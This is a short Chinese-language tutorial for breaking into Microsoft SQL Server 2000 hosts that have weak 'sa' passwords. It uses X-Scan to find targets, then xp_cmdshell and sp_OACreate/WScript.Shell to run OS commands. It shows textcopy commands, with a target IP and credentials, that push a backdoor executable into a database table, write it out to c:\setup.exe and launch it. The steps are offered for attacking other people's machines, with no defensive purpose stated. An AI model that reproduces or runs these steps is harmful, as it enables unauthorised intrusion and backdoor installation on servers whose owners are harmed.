本例使用textcopy上传后门程序到对方主机,并安装。
准备工具:X-Scan、MS-SQL查询分析器、textcopy(后两个在SQL2000里面有)
步骤:
1、用X-Scan扫描到有sql弱口令的主机
2、用查询分析器连上去
检查sql的版本号:select @@version
检查能否运行程序:exec xp_cmdshell 'cmd /c dir c:\'
检查能否使用WScript.Shell组件:
declare @object int
exec sp_OACreate 'WScript.Shell', @object OUT
exec sp_OAMethod @object,'Run', NULL, 'net user'
3、上传后门程序到对方主机的数据库里去
textcopy /S 58.59.123.54 /U sa /P sa123 /D pubs /T pub_info /C logo /W "where pub_id=9901" /F d:\tools\mydoor.exe /I
4、在对方主机上把这个后门程序下载下来
先获得对方主机上sql的安装位置:
exec xp_instance_regread 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\MSSQLServer\Setup', 'SQLPath'
下载后门程序:
declare @object int
exec sp_OACreate 'WScript.Shell', @object OUT
exec sp_OAMethod @object, 'Run', NULL,'"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\textcopy" /S 127.0.0.1 /U sa /P sa123 /D pubs /T pub_info /C logo /W "where pub_id=9901" /F c:\setup.exe /O'
5、运行后门程序
declare @object int
exec sp_OACreate 'WScript.Shell', @object OUT
exec sp_OAMethod @object, 'Run', NULL, 'c:\setup.exe'